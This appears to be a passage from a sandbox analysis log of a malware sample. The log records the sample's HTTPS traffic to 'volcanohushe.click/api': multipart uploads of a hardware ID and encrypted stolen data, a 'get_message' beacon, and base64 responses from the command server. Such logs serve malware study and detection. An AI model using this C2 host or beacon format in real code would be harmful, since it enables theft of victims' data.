                                                                                2024-12-27 07:15:22 UTC15331OUTData Raw: 2d 2d 39 4e 4a 51 33 35 35 4f 35 48 30 54 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 32 46 41 37 37 45 42 41 45 42 32 43 43 42 38 32 34 36 39 32 36 45 35 33 33 43 36 34 44 37 0d 0a 2d 2d 39 4e 4a 51 33 35 35 4f 35 48 30 54 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 39 4e 4a 51 33 35 35 4f 35 48 30 54 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 71 5a 6e 4b 50 2d 2d 63 33 52 6c 64 33 64 7a 0d 0a 2d 2d 39 4e 4a 51 33 35 35 4f
                                                                                Data Ascii: --9NJQ355O5H0TXContent-Disposition: form-data; name="hwid"F72FA77EBAEB2CCB8246926E533C64D7--9NJQ355O5H0TXContent-Disposition: form-data; name="pid"1--9NJQ355O5H0TXContent-Disposition: form-data; name="lid"pqZnKP--c3Rld3dz--9NJQ355O
                                                                                2024-12-27 07:15:22 UTC15331OUTData Raw: ee dd d0 e1 39 de 4d 51 ce 51 5e d0 fc ff b0 bc 1c 12 4d 80 e0 aa 14 fc 1b c0 ea f8 3f 07 4a 06 4a 20 2a af 1a c2 aa 29 46 03 4a 6b 33 67 07 23 00 fd d5 5c 55 b2 11 83 35 57 93 62 89 50 a6 9d 92 d6 42 c0 26 29 dd 3e 07 07 a2 82 37 3f a6 dc 25 ee 35 f9 40 13 d0 4e 46 87 ee e1 b8 39 33 a6 57 63 74 d0 6e 8f 82 19 72 d9 ea cc dc 35 b4 60 ed 2d c3 f4 96 f4 a2 b5 cc cf da a8 15 69 0f 86 0f fa a6 5d 37 8a 92 ba 9e d5 dd 27 d2 7a 5e b8 9c eb b3 aa 30 1c e7 3b 20 14 68 30 7f ac d3 7f ed af 98 f0 7b a9 e5 fb 60 0a 6c c4 07 54 26 9d 3b ad 26 a0 e9 d3 8c 93 84 45 51 f0 ad 04 c7 64 4b 0c 5b 3f 3d 11 54 22 67 0d 91 c6 1a ea be 24 b5 71 c6 0c 5d cb fe 79 1c e1 7f b9 25 39 d4 24 34 a4 8f e7 f4 5e 2a 2f 69 a6 c5 41 2b fd 31 ad 71 1c dd 94 91 1e 46 c6 86 ff f7 e1 3a 76 cd
                                                                                Data Ascii: 9MQQ^M?JJ *)FJk3g#\U5WbPB&)>7?%5@NF93Wctnr5`-i]7'z^0; h0{`lT&;&EQdK[?=T"g$q]y%9$4^*/iA+1qF:v
                                                                                2024-12-27 07:15:22 UTC15331OUTData Raw: 5d 90 78 36 b8 c0 56 f1 e9 26 af 45 07 ce d7 e1 06 d1 42 fa 4c ce ef b2 84 f2 ff 2c 5f df 95 2c 2f b8 06 f0 93 fe df 3d fe 19 10 b3 72 f8 d5 a6 37 a7 6f 55 e9 f4 2e 8a 20 63 90 dc 97 06 2a f5 2c c1 9d 66 bd 85 31 12 80 7b 96 d6 71 e9 fe 33 8e d5 cf 3f 6d 4f 5c 72 1c e7 14 af 9a 94 f9 34 f4 7b ae be d7 1a 98 ed d6 fc a0 d2 5f 6a 5a f7 79 d6 77 6e 02 0c 7b b0 0d 7e ee e1 4c fb b3 56 4d 5f 57 3a 9e 49 fb e5 19 78 db e1 28 a8 f2 30 c5 01 d6 0b 30 ff 36 07 02 dc 44 74 f0 ef 7b c1 27 c0 fc 00 e2 8e cf 83 c4 69 c0 58 45 33 f2 3e 6b 21 26 88 8c 62 dc 3d 41 fa bf c1 ac dc fb 24 45 da 17 1c 40 38 85 64 db 6e ce 29 d0 a3 44 55 e3 01 62 ab d7 76 cb 37 c9 25 43 35 cb db ab 06 95 aa e5 c0 72 0d 89 64 07 7d 17 7a af 24 d8 fd 15 75 39 e7 01 7f f7 7d 70 10 fc 3c 1a ff eb
                                                                                Data Ascii: ]x6V&EBL,_,/=r7oU. c*,f1{q3?mO\r4{_jZywn{~LVM_W:Ix(006Dt{'iXE3>k!&b=A$E@8dn)DUbv7%C5rd}z$u9}p<
                                                                                2024-12-27 07:15:22 UTC15331OUTData Raw: 4e 29 41 1b 4d 50 a5 f9 f5 27 01 9a 79 9a e8 8d 5f da 9e b9 7b bd e6 2f 50 44 d2 c5 aa ba 96 79 ba 9f e9 e7 85 fd 63 56 0c 57 2f ba 0d e3 55 87 74 15 5e 55 64 37 ef 7c 56 fb f7 a1 9b 8f d0 39 92 86 fe e0 bf 24 d2 46 dd 9b 7b 18 c2 62 91 cc 1a 44 df ab b6 87 af f2 d8 cd 1a af e3 4e 77 4e 1d f1 5a bc d3 62 4e eb 9d f8 27 eb 2e ec af 34 06 30 7a b3 c7 d9 7e 9e 76 6b 5e af cf fc 5d 86 07 b1 67 ed c2 a6 54 2a 2d 64 05 c7 55 df 79 4e 1e e5 48 66 96 9f 73 74 e8 41 57 b4 7d 7d c0 36 8d 17 ee b2 a6 8b b3 9a f7 c4 54 ff e5 6f f6 4b d4 b6 77 bf 3e 69 62 1b 83 41 a1 f8 04 34 29 99 98 37 45 bd 9c 60 07 8d e2 3b 0a 0a 88 1e ea 28 da 0d 0a 85 2a 1c 56 fb 8a 16 21 f9 37 c8 93 20 58 eb dc 39 9b b6 7b e2 ee 72 a3 51 69 70 91 4e 56 2e c8 9b 49 3e 76 ec 12 92 cd 3b e2 2f 6d
                                                                                Data Ascii: N)AMP'y_{/PDycVW/Ut^Ud7|V9$F{bDNwNZbN'.40z~vk^]gT*-dUyNHfstAW}}6ToKw>ibA4)7E`;(*V!7 X9{rQipNV.I>v;/m
                                                                                2024-12-27 07:15:22 UTC15331OUTData Raw: fd 4a a2 0e d9 cb 16 fe 60 61 68 66 ef d8 80 78 8e 9c ff cf 09 8c ff 7d d0 03 dd 8f b8 f3 b2 31 7f e3 41 00 1a f4 b9 43 f3 27 b8 c0 14 2b 7f 05 a8 b6 2a 27 41 e2 bd 1f df de ae 38 02 cc 36 eb 8f a1 68 27 7e fe a4 5d 4e dc a8 0f ea 17 c2 0f 7f b8 6d a0 c3 72 53 e9 2e 65 e1 57 b4 74 2d 5e 97 77 ce 89 dd 12 e1 4b b1 04 78 fa c4 55 d8 09 df 20 4a 8f ff c8 9f de 8c 32 b4 19 cd 00 16 69 12 4b 97 e8 99 f9 80 13 48 6c bc 15 e6 10 dc bd d2 f3 75 95 64 4f 47 f7 a1 2a e2 c6 e4 24 77 09 98 d9 9f eb 82 82 b9 78 54 c1 9b 8f e6 13 d0 05 2e ec da 8b 9f 15 c9 23 99 9e 94 e6 c5 fc 36 87 6a 83 50 83 08 6a a2 08 de f3 78 7a 29 4b 09 1b 52 24 63 0d a5 bb 83 22 57 a7 f7 bf f9 63 49 d5 06 40 8f 56 f9 22 53 ef f9 0b b6 a9 85 59 64 5a 11 13 79 bc 36 6c 3f 9b f1 b0 ad c1 b5 d3 64
                                                                                Data Ascii: J`ahfx}1AC'+*'A86h'~]NmrS.eWt-^wKxU J2iKHludOG*$wxT.#6jPjxz)KR$c"WcI@V"SYdZy6l?d
                                                                                2024-12-27 07:15:22 UTC15331OUTData Raw: 0d 8e 58 98 5f ab 04 54 9d 9d b8 7c a0 4f f8 57 94 ae 97 29 e7 8c de 1e 77 e8 e9 c2 7f 6e e6 fa 3b 40 bd 25 ab 91 30 83 89 43 ca a6 ca 45 b3 c4 89 d1 d7 8d 2d 46 15 84 26 c4 8a 70 2d 4d 4e 2a 1e 7d b3 a3 7e d1 e8 d5 61 a7 0d 7b c9 9e 0e 24 1e 65 28 f2 83 e9 a0 c9 a0 2e 8c 4a 9b 83 48 a3 96 d6 82 79 0a 55 47 cc 62 00 46 70 32 37 c9 0d 63 dd 65 94 8f d6 b8 2e 1f 92 a8 26 15 7c 65 d9 b0 d8 b9 91 7c ef b2 54 88 7b 48 54 0c bb d7 99 7b d9 68 85 65 44 8f fb b5 15 54 ca 97 20 77 8a e4 d1 d1 90 63 54 d6 8a a0 2f e9 f3 40 22 34 7a 9a 91 3f 46 84 83 3c 18 37 57 bb 5a d8 8f 17 04 d8 27 79 ee 11 01 d1 19 5c 9b 1f 14 72 28 75 c3 83 21 56 5f 99 96 27 ee 36 33 e6 0e e6 cf 14 44 1f 6b fb b3 9f 13 54 8e da c2 38 3a 6a 15 2c ce 20 2c 74 fc 0d 16 2e 7f 40 6d 7f c2 09 f8 47
                                                                                Data Ascii: X_T|OW)wn;@%0CE-F&p-MN*}~a{$e(.JHyUGbFp27ce.&|e|T{HT{heDT wcT/@"4z?F<7WZ'y\r(u!V_'63DkT8:j, ,t.@mG
                                                                                2024-12-27 07:15:22 UTC15331OUTData Raw: fc df 15 b4 7e fd 56 bd 79 6b 20 62 c3 90 28 10 2e 2c 66 51 16 17 ff 7c e3 b9 ec 86 7a 24 ed 9f dc b7 53 8b 91 ea c6 3a 07 28 b4 bd 12 72 4f 4a 1b 5e 1b 87 85 ed 58 33 08 f8 db 23 31 0f 50 b9 0d cc f4 63 50 ce 29 f4 e2 f0 e1 ce 43 a0 3a d2 f6 f9 ff 5a 20 a4 fc 3d 70 a8 19 0d 1c b0 69 e3 9c bd d7 ff 1e 29 65 c3 f9 f0 48 9a b1 95 9f 02 61 b9 5b 7c c2 ce bf f1 f7 8b fc 62 d6 4c 8c 8e 07 ad 7b a1 ab 68 56 9c 22 7c 78 69 3a ca 59 08 a8 8e 6b 49 92 f2 4e d2 7f 10 99 0f 6d dd 93 b2 ca 41 bc 22 cc 11 1b 47 5f 57 4a ac 7b 54 2a 61 d7 7e 61 1e 22 64 44 a0 22 7d d7 c4 11 7d 4f 28 0e 2c f1 a7 5b dc a3 72 da c0 6f a3 f3 f0 83 d5 22 64 4a 76 bb 45 8c dd 5d 5e 15 f3 44 43 c9 7f 08 62 22 d2 d6 93 85 4e 8b 51 e8 28 47 6c f9 15 07 08 cc 88 dc 92 f7 28 7f eb c1 bf 87 95 03
                                                                                Data Ascii: ~Vyk b(.,fQ|z$S:(rOJ^X3#1PcP)C:Z =pi)eHa[|bL{hV"|xi:YkINmA"G_WJ{T*a~a"dD"}}O(,[ro"dJvE]^DCb"NQ(Gl(
                                                                                2024-12-27 07:15:22 UTC15331OUTData Raw: b3 c8 7b c2 b1 0a ba 0d fb 8e 8f 3a ce 32 68 9a f0 78 f3 d7 f9 4f c8 7a 7c 99 37 12 16 3f 0d 79 7e d5 05 77 89 32 dc bb c4 08 47 5f 70 73 f8 88 af d9 53 9a 26 eb 49 4c ee 3e 2e 47 c5 20 3f 04 37 5c b9 30 52 7f 6a 3d f1 d9 9d 2c f5 cd bb 9f 0c 16 d8 7f be 21 e8 fa 80 71 b6 44 78 8f 1e 58 67 73 e9 f1 c2 58 81 ba cf 3f 67 37 01 8c c9 e8 79 8b ba 64 5a cf e6 84 35 0c af 4e 97 68 82 0a 9e 37 74 18 01 3f 57 fc 33 39 b1 10 eb 31 ff a0 b9 4c c8 50 cc b0 24 81 fb 9f ff a7 f6 00 87 e9 f1 af 7a 60 94 e8 0a 2d fd a4 24 8d b6 3b c3 b5 c7 0d 15 ef 92 7d 53 71 18 2d fb 0d b6 7c 7a 02 b7 9d 05 ab 48 51 9c 47 3d eb 66 f9 49 e2 bc e9 c5 a8 c1 90 e3 e6 1b 98 d8 52 be 87 8d 42 f3 a3 98 6a 36 4c 8a 8b 0c 75 cb ee b9 fd dc ab 57 fa 16 c9 53 7a 4c c4 a4 02 03 89 35 18 80 6d a9
                                                                                Data Ascii: {:2hxOz|7?y~w2G_psS&IL>.G ?7\0Rj=,!qDxXgsX?g7ydZ5Nh7t?W391LP$z`-$;}Sq-|zHQG=fIRBj6LuWSzL5m
                                                                                2024-12-27 07:15:22 UTC15331OUTData Raw: fb be 37 e5 a3 4c 1a 82 85 59 7f 40 fa b3 60 05 80 61 9e 6f 4c e3 8a 27 81 ea 01 49 52 1c a6 70 2e 29 8f c4 cd 35 b7 5d 10 19 ca cb 4f 47 d2 2f 57 4b b5 27 1f 39 19 2b 26 45 49 5e c0 ad e3 7a b3 f6 ca e8 d4 f2 de cc ac 89 e5 c3 45 d1 a5 bf ec a5 67 11 2c 4d c8 6e 09 b6 a6 bf 93 3a 1c 5f 45 cd 18 ba 9f d2 60 21 d6 84 12 a9 64 db c6 99 d8 0d c0 94 e4 35 d7 e4 85 4e 9f 94 ac e7 d4 43 27 d4 84 ee 1f 69 cf 2a 38 53 83 b4 e6 b7 62 3c 60 ea e8 aa fc f2 79 ab 74 c3 bb 46 44 f1 30 75 fd 02 3e 92 d0 cb 60 ce 4d bf 8f c4 f6 72 f6 8f 21 eb 71 28 29 cd 0d d3 dd ab 2a 41 fd 14 b5 16 76 be 1d 4d 02 86 3a 10 e7 26 fd 6f ff bf 94 33 c0 78 60 ff fa 55 83 e4 89 e2 33 db af 31 80 73 fb 18 63 10 0c cb 4d 66 fa c5 6d 59 ea 24 9c 25 73 b3 8b a4 74 b4 9d 13 67 5c 59 c5 72 98 94
                                                                                Data Ascii: 7LY@`aoL'IRp.)5]OG/WK'9+&EI^zEg,Mn:_E`!d5NC'i*8Sb<`ytFD0u>`Mr!q()*AvM:&o3x`U31scMfmY$%stg\Yr
                                                                                2024-12-27 07:15:22 UTC15331OUTData Raw: e0 0c 44 8c 31 2e a2 85 3d 74 e0 72 81 03 08 0b b7 8e 24 b7 3d 79 40 5a 55 b4 83 bd f8 cb 86 e3 a4 82 1c 6f af 7e 13 50 43 20 bb ad 18 8a ee 2c 0c 93 43 7d b1 4c f4 fa 98 7a 53 d8 c7 f1 57 d7 0b 9c a1 74 07 17 25 31 17 98 e2 24 33 6f de 1b d5 a4 7a b5 3a 3c 38 9a 7d 48 2e d6 27 1a 10 d6 d4 c7 12 bc b6 ac 87 6a 5e f3 a7 fe 71 1e a4 c6 82 ba 3f 59 2a 34 c2 f7 b8 78 c3 50 c3 72 96 9f 4c 1b 43 f2 ac a3 a9 61 30 2e 23 cd 07 37 3d c4 60 4d ae 9e 6f c2 41 20 7e de e7 cc bf b2 d9 5b 36 07 bf 6e e1 c1 4f e1 ec b9 3a ad 83 27 b3 71 8c 46 79 ba 74 2a e2 cb 73 41 b2 03 39 e6 c9 48 d4 c6 6e 0a 8e 2f a6 9c 75 50 e6 ef e0 70 52 26 9e 15 25 f6 08 0d dc fa 17 97 60 a3 72 ee a2 d8 6b 4f f2 93 c8 2e 63 ff f3 25 bf cd 62 48 04 74 f7 39 82 c8 03 32 3f 9d fc 91 55 a7 fc 13 bb
                                                                                Data Ascii: D1.=tr$=y@ZUo~PC ,C}LzSWt%1$3oz:<8}H.'j^q?Y*4xPrLCa0.#7=`MoA ~[6nO:'qFyt*sA9Hn/uPpR&%`rkO.c%bHt92?U
                                                                                2024-12-27 07:15:25 UTC1153INHTTP/1.1 200 OK
                                                                                Date: Fri, 27 Dec 2024 07:15:25 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: PHPSESSID=9deq8nfrd228tv2bmd0stv0e1t; expires=Tue, 22 Apr 2025 01:02:03 GMT; Max-Age=9999999; path=/
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                X-Frame-Options: DENY
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                cf-cache-status: DYNAMIC
                                                                                vary: accept-encoding
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BvwOLsVvwlGQOIxLmdSb3dvBVsG%2B%2B6Z39AT%2FZdoW8lh%2F9Fcd6YPMOaQArJZi%2FYZlkZ9HNG9QZVSV7d3RxC%2FQ2%2B8mepROb1KkgSGpTmBnVhqD1w2%2FnhES%2Flzu%2FEEGgR1NxTU%2BZWY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8f8784e43f8e42e1-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1663&min_rtt=1654&rtt_var=639&sent=333&recv=592&lost=0&retrans=0&sent_bytes=2843&recv_bytes=572375&delivery_rate=1685912&cwnd=232&unsent_bytes=0&cid=4a7bdce6ff964794&ts=2434&x=0"


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                7192.168.2.949758104.21.71.1554437580C:\Users\user\Desktop\uUtgy7BbF1.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-12-27 07:15:26 UTC266OUTPOST /api HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                Content-Length: 85
                                                                                Host: volcanohushe.click
                                                                                2024-12-27 07:15:26 UTC85OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 70 71 5a 6e 4b 50 2d 2d 63 33 52 6c 64 33 64 7a 26 6a 3d 26 68 77 69 64 3d 46 37 32 46 41 37 37 45 42 41 45 42 32 43 43 42 38 32 34 36 39 32 36 45 35 33 33 43 36 34 44 37
                                                                                Data Ascii: act=get_message&ver=4.0&lid=pqZnKP--c3Rld3dz&j=&hwid=F72FA77EBAEB2CCB8246926E533C64D7
                                                                                2024-12-27 07:15:27 UTC1124INHTTP/1.1 200 OK
                                                                                Date: Fri, 27 Dec 2024 07:15:27 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: PHPSESSID=9vnudj2k1at7j2ugjc1t9if6u7; expires=Tue, 22 Apr 2025 01:02:06 GMT; Max-Age=9999999; path=/
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                X-Frame-Options: DENY
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                cf-cache-status: DYNAMIC
                                                                                vary: accept-encoding
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=irIzWseFwM7CqVEPP2n4eMnwjZtJGjLXrtxjHp9GQmmWcA%2FOjYUiAS1mSSqYbfJAK7gj2NRuReXEm2IndS8mI7oAtjhFFn7OVZpoJicERBgH7W9CCS3J4IYmk1J4vUhvkTLrRqQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8f8784fd7a50428f-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2539&min_rtt=2063&rtt_var=1114&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=987&delivery_rate=1415414&cwnd=100&unsent_bytes=0&cid=bd21322db7dce3e2&ts=872&x=0"
                                                                                2024-12-27 07:15:27 UTC245INData Raw: 33 36 39 34 0d 0a 33 33 33 79 45 39 45 5a 30 71 47 73 41 2f 34 75 75 33 65 65 5a 76 65 38 2f 6f 7a 44 32 70 6d 79 37 4e 69 4d 66 50 53 41 55 71 4b 45 42 74 42 31 70 54 76 6f 6b 49 41 68 6d 77 79 42 52 72 4a 45 6b 35 37 45 72 70 47 56 71 64 36 2b 37 2b 6b 52 6a 62 6b 64 36 34 6b 71 6b 45 6d 65 57 49 69 59 6d 6c 6d 31 66 6f 34 37 7a 79 57 44 2b 4b 65 38 6e 2f 58 4b 34 4e 2b 65 79 79 75 61 79 77 50 4e 6c 51 6e 44 49 70 6c 74 6f 38 50 67 4d 38 70 57 37 53 33 71 44 63 50 2b 6b 4c 2b 7a 73 66 62 75 77 37 50 34 50 62 2b 77 48 4d 69 4d 52 4c 68 62 73 6b 79 49 77 4d 39 7a 76 55 58 76 41 39 51 7a 6b 6f 2b 4f 2f 37 57 4f 38 50 53 36 74 62 34 6f 6b 38 63 30 78 37 49 75 6d 44 69 43 4b 5a 50 54 2f 54 47 77 66 6f 73 63 2b 68 36 6d 32 49 37
                                                                                Data Ascii: 3694333yE9EZ0qGsA/4uu3eeZve8/ozD2pmy7NiMfPSAUqKEBtB1pTvokIAhmwyBRrJEk57ErpGVqd6+7+kRjbkd64kqkEmeWIiYmlm1fo47zyWD+Ke8n/XK4N+eyyuaywPNlQnDIplto8PgM8pW7S3qDcP+kL+zsfbuw7P4Pb+wHMiMRLhbskyIwM9zvUXvA9Qzko+O/7WO8PS6tb4ok8c0x7IumDiCKZPT/TGwfosc+h6m2I7
                                                                                2024-12-27 07:15:27 UTC1369INData Raw: 31 71 4a 48 4b 78 4b 65 2b 33 78 36 58 30 79 58 4b 36 51 33 46 52 4c 52 50 36 2f 4c 50 63 35 6c 49 7a 55 2f 6d 4b 36 58 4c 7a 4c 32 46 6e 66 66 33 67 49 44 6f 43 36 44 4b 41 4a 43 4b 43 6f 68 47 73 6e 43 2b 6d 50 38 6f 69 45 2f 63 54 39 30 32 6d 34 53 74 33 2f 53 51 78 5a 33 48 6d 38 31 4d 70 2f 6b 44 37 4c 55 75 68 6b 71 4a 65 6f 66 71 7a 56 71 4b 62 64 55 30 32 44 4b 6b 2f 38 33 38 73 4b 7a 4e 32 36 71 4f 34 55 36 51 35 78 58 45 35 78 53 6f 65 61 52 6f 34 75 44 64 55 73 78 67 36 30 66 72 41 6f 2f 75 6b 76 79 36 73 64 4c 67 76 4f 6a 67 4c 73 50 6c 59 4e 76 6d 4d 72 74 46 68 6e 75 49 37 75 31 5a 78 77 58 68 50 50 68 54 75 2b 32 39 2b 4b 6d 44 71 5a 6d 56 69 72 38 36 73 39 63 38 36 59 34 4e 73 53 53 43 54 35 72 56 6d 6d 47 79 48 6f 38 51 32 44 79 44 31 38
                                                                                Data Ascii: 1qJHKxKe+3x6X0yXK6Q3FRLRP6/LPc5lIzU/mK6XLzL2Fnff3gIDoC6DKAJCKCohGsnC+mP8oiE/cT902m4St3/SQxZ3Hm81Mp/kD7LUuhkqJeofqzVqKbdU02DKk/838sKzN26qO4U6Q5xXE5xSoeaRo4uDdUsxg60frAo/ukvy6sdLgvOjgLsPlYNvmMrtFhnuI7u1ZxwXhPPhTu+29+KmDqZmVir86s9c86Y4NsSSCT5rVmmGyHo8Q2DyD18
                                                                                2024-12-27 07:15:27 UTC1369INData Raw: 79 49 43 69 69 4c 77 58 6b 50 67 41 7a 71 38 45 6d 56 69 44 56 75 4c 4e 2f 6a 53 62 51 38 4a 4f 30 53 2b 68 36 35 7a 57 6a 4a 76 44 69 39 71 43 78 79 7a 42 7a 41 50 68 71 7a 6d 72 49 34 30 32 67 66 4f 66 52 62 6c 35 31 54 7a 50 46 72 4b 4c 72 64 71 4c 72 71 2f 51 6f 4f 69 34 46 4b 4c 61 4a 73 6e 72 50 35 77 67 6f 58 4b 39 2f 59 4e 6f 69 6d 2f 77 52 39 41 4d 6f 34 57 30 78 4b 43 50 77 39 4f 50 71 4d 38 58 6f 50 51 59 39 37 70 4f 67 6d 43 6e 54 62 76 6e 2b 6d 37 4d 65 74 77 77 2b 41 4f 61 37 35 53 6e 6b 4f 72 59 77 4c 33 71 77 69 7a 45 36 7a 62 61 6a 52 47 43 61 72 70 53 67 4f 36 63 62 36 77 5a 33 68 72 6e 58 37 6a 31 71 4e 75 68 67 4e 62 7a 74 75 47 36 4a 72 2f 51 5a 2b 36 4f 50 6f 5a 58 69 43 6d 4f 6a 76 39 52 7a 57 6a 38 49 50 41 74 70 73 79 37 75 35 43
                                                                                Data Ascii: yICiiLwXkPgAzq8EmViDVuLN/jSbQ8JO0S+h65zWjJvDi9qCxyzBzAPhqzmrI402gfOfRbl51TzPFrKLrdqLrq/QoOi4FKLaJsnrP5wgoXK9/YNoim/wR9AMo4W0xKCPw9OPqM8XoPQY97pOgmCnTbvn+m7Metww+AOa75SnkOrYwL3qwizE6zbajRGCarpSgO6cb6wZ3hrnX7j1qNuhgNbztuG6Jr/QZ+6OPoZXiCmOjv9RzWj8IPAtpsy7u5C
                                                                                2024-12-27 07:15:27 UTC1369INData Raw: 4a 2b 2b 44 49 54 34 4a 39 47 6f 53 38 56 43 34 31 65 61 6c 76 5a 4d 75 57 6e 57 4f 2b 73 71 6e 66 71 47 77 4b 4b 76 30 4d 69 2f 37 37 55 66 73 4d 45 48 37 6f 30 70 6d 33 75 6f 51 61 62 5a 31 47 4b 59 64 75 67 6e 2b 7a 48 45 2f 71 32 35 39 37 62 31 2b 4c 58 70 2b 69 53 2b 38 68 6a 51 6b 43 65 78 52 71 74 67 69 38 66 30 56 34 64 4d 38 31 7a 34 55 70 6a 34 72 39 58 77 6c 4d 57 64 6d 61 33 44 48 70 62 74 59 4a 61 31 44 35 4e 37 6b 48 4f 36 31 76 6b 36 6a 47 54 71 52 38 59 56 76 39 2b 39 34 4f 69 41 30 38 47 4a 6c 4e 77 36 72 65 49 4b 35 62 73 77 74 56 2b 6b 4b 61 76 67 2f 47 47 58 5a 4e 34 63 30 53 32 7a 35 6f 62 30 6b 6f 61 32 34 61 69 4f 78 54 4b 6e 2b 47 47 56 72 78 71 66 61 34 30 32 76 4a 50 55 53 62 56 79 6c 45 4c 56 4e 4a 79 4d 6b 73 32 69 34 76 50 45
                                                                                Data Ascii: J++DIT4J9GoS8VC41ealvZMuWnWO+sqnfqGwKKv0Mi/77UfsMEH7o0pm3uoQabZ1GKYdugn+zHE/q2597b1+LXp+iS+8hjQkCexRqtgi8f0V4dM81z4Upj4r9XwlMWdma3DHpbtYJa1D5N7kHO61vk6jGTqR8YVv9+94OiA08GJlNw6reIK5bswtV+kKavg/GGXZN4c0S2z5ob0koa24aiOxTKn+GGVrxqfa402vJPUSbVylELVNJyMks2i4vPE
                                                                                2024-12-27 07:15:27 UTC1369INData Raw: 6d 47 78 41 75 57 69 77 36 72 56 70 42 42 74 38 7a 76 4e 61 68 63 37 44 62 30 58 34 62 35 72 75 47 33 71 4d 76 47 32 75 7a 31 46 37 2f 54 59 38 32 78 4e 4b 5a 5a 76 47 47 55 78 65 4a 56 75 55 7a 68 41 71 59 30 71 35 4f 6b 33 4b 79 74 2b 2b 71 6a 6d 75 6b 45 72 74 4d 30 31 72 4d 4a 74 57 71 4c 66 36 50 53 32 45 53 6e 61 65 74 44 7a 67 71 35 39 62 62 39 70 4b 43 73 34 61 6d 78 7a 79 6a 41 79 47 76 75 68 6a 47 39 52 70 59 72 6e 66 6e 70 62 37 56 55 39 7a 4b 74 42 37 4c 32 76 65 43 58 73 38 44 37 78 2b 7a 4a 47 6f 57 78 46 73 4f 53 4b 5a 42 78 34 6e 32 78 7a 4a 39 45 6c 67 58 6f 52 2f 51 36 32 4e 69 31 2b 71 47 78 32 4e 54 61 37 75 59 72 75 75 4a 6a 2f 76 41 5a 6f 33 2b 44 4c 72 48 37 34 58 71 47 48 63 6f 44 2b 52 43 50 34 4e 48 68 67 4a 76 32 37 73 4f 6f 36
                                                                                Data Ascii: mGxAuWiw6rVpBBt8zvNahc7Db0X4b5ruG3qMvG2uz1F7/TY82xNKZZvGGUxeJVuUzhAqY0q5Ok3Kyt++qjmukErtM01rMJtWqLf6PS2ESnaetDzgq59bb9pKCs4amxzyjAyGvuhjG9RpYrnfnpb7VU9zKtB7L2veCXs8D7x+zJGoWxFsOSKZBx4n2xzJ9ElgXoR/Q62Ni1+qGx2NTa7uYruuJj/vAZo3+DLrH74XqGHcoD+RCP4NHhgJv27sOo6
                                                                                2024-12-27 07:15:27 UTC1369INData Raw: 35 6b 62 4a 4e 6b 43 62 67 53 59 71 59 7a 6e 65 4c 47 2f 55 51 74 54 36 63 32 34 2f 6e 72 36 6a 79 34 74 53 36 75 52 75 59 30 69 48 42 6e 51 6d 2b 65 72 42 79 2b 65 50 38 4d 38 35 72 36 51 4f 6f 55 6f 37 58 74 63 57 75 37 38 50 51 6f 49 2f 68 4c 6f 61 32 47 65 75 56 4d 35 4e 72 68 31 43 59 31 75 64 4e 72 6b 6e 50 50 66 56 57 6d 2f 32 66 74 4b 6d 73 34 2f 53 72 6a 2b 49 33 70 65 38 37 77 4c 4d 52 73 43 66 6e 51 35 58 4b 6d 47 79 5a 52 59 6f 6d 72 69 32 30 6a 74 58 37 38 62 37 73 77 62 32 54 76 41 69 53 78 43 72 42 6a 43 2b 78 65 59 56 7a 67 4a 6a 4f 64 34 73 61 37 67 54 6e 50 49 54 75 6b 75 53 4c 6b 76 71 41 71 4c 2f 4c 47 70 48 69 42 66 71 79 54 35 56 5a 6f 32 32 6f 32 2b 52 58 6e 55 44 57 50 50 77 78 75 64 32 30 35 4a 47 56 36 74 6a 64 37 38 63 79 70 2f
